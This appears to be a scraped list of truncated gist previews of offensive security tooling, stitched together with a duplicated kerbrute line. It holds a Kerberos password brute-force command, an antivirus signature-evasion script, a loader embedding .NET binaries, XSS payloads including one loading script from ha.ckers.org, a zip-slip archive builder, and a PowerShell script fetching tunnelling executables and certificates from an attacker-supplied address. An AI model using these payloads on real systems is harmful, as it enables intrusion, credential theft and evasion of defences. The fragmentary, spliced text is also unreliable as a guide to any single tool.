With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
function Install-WinDbg { | |
param( | |
[switch] $Start | |
) | |
# Change default progress preference (faster downloads) | |
$DefaultProgressPreference = $ProgressPreference | |
$ProgressPreference = 'SilentlyContinue' | |
Write-Host "Downloading windbg.appinstaller (XML manifest file)" |
function Find-AVSignature { | |
<# | |
.SYNOPSIS | |
Find-AVSignature | |
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com | |
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) | |
License: BSD 3-Clause |
package main | |
/* | |
Example Go program with multiple .NET Binaries embedded | |
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
$ go get -u github.com/gobuffalo/packr/packr | |
Place all your EXEs are in a "binaries" folder |
using NtApiDotNet; | |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Linq; | |
using System.Text; | |
using System.Threading; | |
using System.Threading.Tasks; |
// A demonstration example for http://stackoverflow.com/a/26124494 | |
// It runs a goroutine locked to an OS thread on Windows | |
// then impersonates that thread as another user using its name | |
// and plaintext password, then reverts to the default security | |
// context before detaching from its OS thread. | |
package main | |
import ( | |
"log" | |
"runtime" |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
#!/usr/bin/env python | |
import zipfile | |
import sys | |
import os | |
''' | |
Usage: | |
python zipslip.py xct.zip root.txt ../../../../.. | |
Added ../../../../../root.txt to xct.zip | |
''' |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
param([string]$addr, [string]$port)
wget "http://${addr}:${port}/ssf.exe" -o "ssf.exe"
wget "http://${addr}:${port}/ssfd.exe" -o "ssfd.exe"
mkdir certs
cd certs
wget "http://${addr}:${port}/certs/certificate.crt" -o "certificate.crt"
wget "http://${addr}:${port}/certs/dh4096.pem" -o "dh4096.pem"